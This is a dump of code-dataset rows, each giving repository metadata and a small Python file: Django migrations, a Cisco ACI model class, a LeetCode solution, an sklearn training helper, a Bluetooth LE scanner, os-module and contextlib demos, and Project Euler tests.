refs/heads/master
| 2021-06-18T09:07:30.256614 | 2017-06-25T10:14:54 | 2017-06-25T10:14:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 583 |
py
|
import contextlib
class Context(contextlib.ContextDecorator):
def __init__(self, how_used):
self.how_used = how_used
print('__init__({})'.format(how_used))
def __enter__(self):
print('__enter__({})'.format(self.how_used))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
print('__exit__({})'.format(self.how_used))
@Context('as decorator')
def func(message):
print(message)
print()
with Context('as context manager'):
print('Doing work in the context')
print()
func('Doing work in the wrapped function')
|
[
"[email protected]"
] | |
234dd1f7bc842aa839543c69dc1229e4cbfc4ef0
|
299e2c985b4a2921b150579955e7c60eee094397
|
/news/migrations/0006_auto_20190628_1447.py
|
9bd54a81c13dcf49ebf7819d2ee21928410fb2e4
|
[
"MIT"
] |
permissive
|
Nigar-mr/News
|
48d58fbaab0f2bb8cc717323449d7eba14b94918
|
b75b78cc9fa64259f4239b1d456daa5224040ce4
|
refs/heads/master
| 2020-06-17T15:20:05.411391 | 2019-07-09T08:21:24 | 2019-07-09T08:21:24 | 195,961,863 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 407 |
py
|
# Generated by Django 2.2.2 on 2019-06-28 10:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news', '0005_remove_headermodel_dropdown'),
]
operations = [
migrations.AlterField(
model_name='headermodel',
name='image',
field=models.ImageField(upload_to='news/icons/'),
),
]
|
[
"[email protected]"
] | |
4be510286a64309365e96715a1c1baddce168127
|
24fe1f54fee3a3df952ca26cce839cc18124357a
|
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/comp/accessp.py
|
6214ab713e8f774ee7c5499f70f913487eac8f0d
|
[] |
no_license
|
aperiyed/servicegraph-cloudcenter
|
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
|
9eb7975f2f6835e1c0528563a771526896306392
|
refs/heads/master
| 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 |
Python
|
UTF-8
|
Python
| false | false | 5,062 |
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AccessP(Mo):
meta = ClassMeta("cobra.model.comp.AccessP")
meta.isAbstract = True
meta.moClassName = "compAccessP"
meta.moClassName = "compAccessP"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstraction of Access Profile"
meta.writeAccessMask = 0x11
meta.readAccessMask = 0x11
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.vmm.DomP")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.concreteSubClasses.add("cobra.model.vmm.UsrAccP")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmOrchsProvPlan", "Provider Plans", "cobra.model.vmm.OrchsProvPlan"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ADomPToEthIf", "Interface", "cobra.model.l1.EthIf"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmEpPD", "Portgroups", "cobra.model.vmm.EpPD"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
|
[
"[email protected]"
] | |
9e03554339fbf11a977d749579273a5308ebe17c
|
0ba1743e9f865a023f72a14d3a5c16b99ee7f138
|
/problems/test_0413_dp.py
|
b94b4a4005613d47a4b97b5eda809a2ed0f42f15
|
[
"Unlicense"
] |
permissive
|
chrisxue815/leetcode_python
|
d0a38a4168243b0628256825581a6df1b673855c
|
a33eb7b833f6998972e5340d383443f3a2ee64e3
|
refs/heads/main
| 2022-06-20T15:09:27.221807 | 2022-06-02T21:55:35 | 2022-06-02T21:55:35 | 94,590,264 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 997 |
py
|
import unittest
import utils
# O(n^2) time. O(n) space. DP.
class Solution:
def numberOfArithmeticSlices(self, a):
"""
:type a: List[int]
:rtype: int
"""
# Common difference
dp = [0] * len(a)
result = 0
for p in range(len(a) - 1):
q = p + 1
dp[p] = a[q] - a[p]
for distance in range(2, len(a)):
for p in range(len(a) - distance):
q = p + distance
if dp[p] == a[q] - a[q - 1]:
result += 1
else:
dp[p] = None
return result
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
actual = Solution().numberOfArithmeticSlices(**case.args.__dict__)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
15779835a64dfa759bd9410bf9661ec5cf78f3aa
|
9a1538123b8abec14410dad46c437cf735684dd9
|
/product/migrations/0018_productproperty_value_type.py
|
48a0a691e24e11ea5cedf4a2158c7c000f223fd6
|
[] |
no_license
|
asmuratbek/zastroy24
|
deec6bd65229aeb29eb313d915c6c47ca036a8aa
|
d68ce21beefc644752a1271a4d8981cd2423afba
|
refs/heads/master
| 2020-04-27T18:44:26.845151 | 2019-03-08T18:09:13 | 2019-03-08T18:09:13 | 174,585,168 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 662 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-12-24 09:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0017_auto_20171224_1536'),
]
operations = [
migrations.AddField(
model_name='productproperty',
name='value_type',
field=models.CharField(help_text='\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043a\u0433', max_length=255, null=True, verbose_name='\u0415\u0434\u0438\u043d\u0438\u0446\u0430 \u0438\u0437\u043c\u0435\u0440\u0435\u043d\u0438\u044f'),
),
]
|
[
"[email protected]"
] | |
7ea4348e0388b427adcc0d1d2c31b06df0550e19
|
023acc1445ebde3e9fe4318fcfd60908c91d74d5
|
/sli/train.py
|
77fdce51b077a71a4dc73a1c298f924c963fc9d0
|
[] |
no_license
|
counterfactuals/sensible-local-interpretations
|
99d22df59a6f07b6135762eec57c29e80dac9cdf
|
ab7af07299ea2ec1a1be28e0bf38f4947321d04c
|
refs/heads/master
| 2022-03-12T11:30:19.296104 | 2019-12-02T20:31:27 | 2019-12-02T20:31:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,828 |
py
|
from copy import deepcopy
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, GradientBoostingClassifier
from sklearn.tree import export_graphviz, DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.tree import plot_tree
from sampling import resample
def train_models(X: np.ndarray, y: np.ndarray,
class_weights: list=[0.5, 1.0, 2.0], model_type: str='logistic'):
'''
Params
------
class_weights
Weights to weight the positive class, one for each model to be trained
'''
assert np.unique(y).size == 2, 'Task must be binary classification!'
models = []
for class_weight in class_weights:
if model_type == 'logistic':
m = LogisticRegression(solver='lbfgs', class_weight={0: 1, 1: class_weight})
elif model_type == 'mlp2':
m = MLPClassifier()
X, y = resample(X, y, sample_type='over', class_weight=class_weight)
elif model_type == 'rf':
m = RandomForestClassifier(class_weight={0: 1, 1: class_weight})
elif model_type == 'gb':
m = GradientBoostingClassifier()
X, y = resample(X, y, sample_type='over', class_weight=class_weight)
m.fit(X, y)
models.append(deepcopy(m))
return models
def regress(X: np.ndarray, y: np.ndarray, model_type: str='linear'):
if model_type == 'linear':
m = LinearRegression()
elif model_type == 'mlp2':
m = MLPRegressor()
elif model_type == 'rf':
m = RandomForestRegressor()
elif model_type == 'gb':
m = GradientBoostingRegressor()
m.fit(X, y)
return m
|
[
"[email protected]"
] | |
cc2b9367dcb75a3613b7456a24d7379ffed94e1f
|
23daf97312ea16cc399feedfa048131d564b83fa
|
/lib/BluenetLib/lib/core/bluetooth_delegates/AioScanner.py
|
1bdc096e712664a077ca209d4d5155cfeaf19041
|
[] |
no_license
|
wickyb94/programmer
|
6e2cafa3fbb9f54bfdcd24f7062f6425ebb429fc
|
be0f01586365a79b51af8c4da376fe216d38afba
|
refs/heads/master
| 2022-04-09T17:52:18.106331 | 2020-03-02T15:57:02 | 2020-03-02T15:57:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,569 |
py
|
import asyncio
import sys
import time
import aioblescan
from BluenetLib.lib.util.LogUtil import tfs
counter = 0
prev = time.time()
start = time.time()
class AioScanner:
def __init__(self, hciIndex = 0):
self.event_loop = None
self.bluetoothControl = None
self.connection = None
self.timeRequestStart = 0
self.eventReceived = False
self.hciIndex = hciIndex
self.delegate = None
self.scanRunning = False
self.scanDuration = 0
def withDelegate(self, delegate):
self.delegate = delegate
return self
def start(self, duration):
self.scanRunning = True
self.scanDuration = duration
self.scan()
def stop(self):
self.scanRunning = False
def scan(self, attempt = 0):
print(tfs(), "Attempt Scanning")
self.eventReceived = False
event_loop = asyncio.new_event_loop()
bluetoothSocket = aioblescan.create_bt_socket(self.hciIndex)
transportProcess = event_loop._create_connection_transport(bluetoothSocket, aioblescan.BLEScanRequester, None, None)
self.connection, self.bluetoothControl = event_loop.run_until_complete(transportProcess)
print(tfs(), "Connection made!")
self.bluetoothControl.process = self.parsingProcess
self.timeRequestStart = time.time()
self.bluetoothControl.send_scan_request()
print(tfs(), "Scan command sent!")
alreadyCleanedUp = False
try:
event_loop.run_until_complete(self.awaitEventSleep(1))
if not self.eventReceived:
if attempt < 10:
print(tfs(), 'Retrying... Closing event loop', attempt)
self.cleanup(event_loop)
alreadyCleanedUp = True
self.scan(attempt + 1)
return
else:
pass
event_loop.run_until_complete(self.awaitActiveSleep(self.scanDuration))
except KeyboardInterrupt:
print('keyboard interrupt')
finally:
print("")
if not alreadyCleanedUp:
print(tfs(), 'closing event loop', attempt)
self.cleanup(event_loop)
async def awaitEventSleep(self, duration):
while self.eventReceived == False and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
async def awaitActiveSleep(self, duration):
while self.scanRunning == True and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
def cleanup(self, event_loop):
print(tfs(), "Cleaning up")
self.bluetoothControl.stop_scan_request()
self.connection.close()
event_loop.close()
def parsingProcess(self, data):
ev=aioblescan.HCI_Event()
xx=ev.decode(data)
hasAdvertisement = self.dataParser(ev)
if hasAdvertisement and self.delegate is not None:
self.delegate.handleDiscovery(ev)
def dataParser(self, data):
#parse Data required for the scanner
advertisementReceived = False
for d in data.payload:
if isinstance(d, aioblescan.aioblescan.HCI_CC_Event):
self.checkHCI_CC_EVENT(d)
elif isinstance(d, aioblescan.Adv_Data):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.HCI_LE_Meta_Event):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.aioblescan.HCI_LEM_Adv_Report):
self.eventReceived = True
advertisementReceived = True
return advertisementReceived
def checkHCI_CC_EVENT(self, event):
for d in event.payload:
if isinstance(d, aioblescan.aioblescan.OgfOcf):
if d.ocf == b'\x0b':
print(tfs(),"Settings received")
elif d.ocf == b'\x0c':
print(tfs(), "Scan command received")
# if isinstance(d, aioblescan.aioblescan.Itself):
# print("byte", d.name)
# if isinstance(d, aioblescan.aioblescan.UIntByte):
# print("UIntByte", d.val)
def parseAdvertisement(self, decodedHciEvent):
global counter
if counter % 50 == 0:
counter = 0
print(".")
else:
sys.stdout.write(".")
counter+= 1
# decodedHciEvent.show()
|
[
"[email protected]"
] | |
96fd2bd857643c663092d384cf8ec78d6b61a6cf
|
fb0f6646b2a7972454453907fbdc656b7471f55f
|
/p322_module_os.py
|
dd9437674eb42016e5d93c9c80fd0ac56ab764e7
|
[] |
no_license
|
woojin97318/python_basic
|
6497d5c85369746edfe8ca79ad7f3f47c871ee66
|
97e9a322a08f1483bf35dc03507ac36af2bf1ddb
|
refs/heads/master
| 2023-07-15T03:06:05.716623 | 2021-08-25T03:46:48 | 2021-08-25T03:46:48 | 399,681,125 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 619 |
py
|
# ๋ชจ๋์ ์ฝ์ด ๋ค์
๋๋ค.
import os
# ๊ธฐ๋ณธ ์ ๋ณด๋ฅผ ๋ช๊ฐ ์ถ๋ ฅํด ๋ด
์๋ค.
print("ํ์ฌ ์ด์์ฒด์ :", os.name)
print("ํ์ฌ ํด๋:", os.getcwd())
print("ํ์ฌ ํด๋ ๋ด๋ถ์ ์์:", os.listdir())
# ํด๋๋ฅผ ๋ง๋ค๊ณ ์ ๊ฑฐํฉ๋๋ค.[ํด๋๊ฐ ๋น์ด์์ ๋๋ง ์ ๊ฑฐ ๊ฐ๋ฅ]
os.mkdir("hello")
os.rmdir("hello")
# ํ์ผ์ ์์ฑํ๊ณ + ํ์ผ ์ด๋ฆ์ ๋ณ๊ฒฝํฉ๋๋ค.
with open("original.txt", "w") as file:
file.write("hello")
os.rename("original.txt", "new.txt")
# ํ์ผ์ ์ ๊ฑฐํฉ๋๋ค.
os.remove("new.txt")
# os.unlink("new.txt")
# ์์คํ
๋ช
๋ น์ด
os.system("dir")
|
[
"[email protected]"
] | |
44b780296f882a1446213f64764a325db1448200
|
850001831b1fcdd4d27e328b356fc34909ca2917
|
/examples/spawn.py
|
367e288dfa2b65a8b6bb4a47c0514b8b5cd14e4f
|
[
"BSD-3-Clause"
] |
permissive
|
yidiq7/pathos
|
b337353ccfe447866c46a4a784a7908c2f3fe31e
|
7e4fef911dc0283e245189df4683eea65bfd90f0
|
refs/heads/master
| 2022-08-24T08:43:34.009115 | 2020-05-27T12:18:21 | 2020-05-27T12:18:21 | 267,310,390 | 0 | 0 |
NOASSERTION
| 2020-05-27T12:14:50 | 2020-05-27T12:14:47 | null |
UTF-8
|
Python
| false | false | 957 |
py
|
#!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2016 California Institute of Technology.
# Copyright (c) 2016-2020 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/pathos/blob/master/LICENSE
"""
demonstrate pathos's spawn2 function
"""
from __future__ import print_function
from pathos.util import spawn2, _b, _str
if __name__ == '__main__':
import os
def onParent(pid, fromchild, tochild):
s = _str(fromchild.readline())
print(s, end='')
tochild.write(_b('hello son\n'))
tochild.flush()
os.wait()
def onChild(pid, fromparent, toparent):
toparent.write(_b('hello dad\n'))
toparent.flush()
s = _str(fromparent.readline())
print(s, end='')
os._exit(0)
spawn2(onParent, onChild)
# End of file
|
[
"mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df"
] |
mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df
|
daa82ba337e7c7ea48f602e231247e8415e0c3dc
|
805fbd9aead4fc2998fd5d8790043a20b2656915
|
/data_format/__init__.py
|
cb3c33b9d09bcf03a38af8f8bdd84bd066689fa1
|
[] |
no_license
|
chenhaomingbob/ToolBox
|
f9a6ef64352c85ae84c44e9fab53aab74992c7c5
|
962304c004aa39e8a5bcb153def9dc3895595c9f
|
refs/heads/master
| 2021-05-19T00:37:23.170766 | 2020-06-01T10:57:05 | 2020-06-01T10:57:05 | 251,496,830 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 145 |
py
|
#!/usr/bin/python
# -*- coding:utf8 -*-
"""
Author: Haoming Chen
E-mail: [email protected]
Time: 2020/03/23
Description:
"""
|
[
"[email protected]"
] | |
d3743b3de00d52481bf2c74a20fb31405afce4c4
|
fb81442e5d2e940ad967bd0a264b7918d739173f
|
/py_test.py
|
49e8b365b34d93965925230a57e83abad11d1008
|
[] |
no_license
|
Amertz08/euler_py
|
054f45d110b8cf4d0e9afeb7f5c608026226443c
|
0dd217c9e0a061e3622fd150b61e24a2c6bad5af
|
refs/heads/master
| 2021-05-06T23:15:42.742578 | 2017-12-07T00:16:31 | 2017-12-07T00:16:31 | 112,960,695 | 0 | 1 | null | 2017-12-06T20:32:57 | 2017-12-03T20:21:48 |
C
|
UTF-8
|
Python
| false | false | 515 |
py
|
import euler_py as eul
def test_problem_one():
result = eul.problem_one(10)
assert result == 23, f'Problem 1 should be 23: {result}'
def test_problem_two():
result = eul.problem_two(89)
assert result == 44, f'Problem 2 should be 44: {result}'
def test_problem_three():
result = eul.problem_three(13195)
assert result == 29, f'Problem 3 should be 29: {result}'
def test_problem_four():
result = eul.problem_four(2)
assert result == 9009, f'Problem 4 should be 9009: {result}'
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.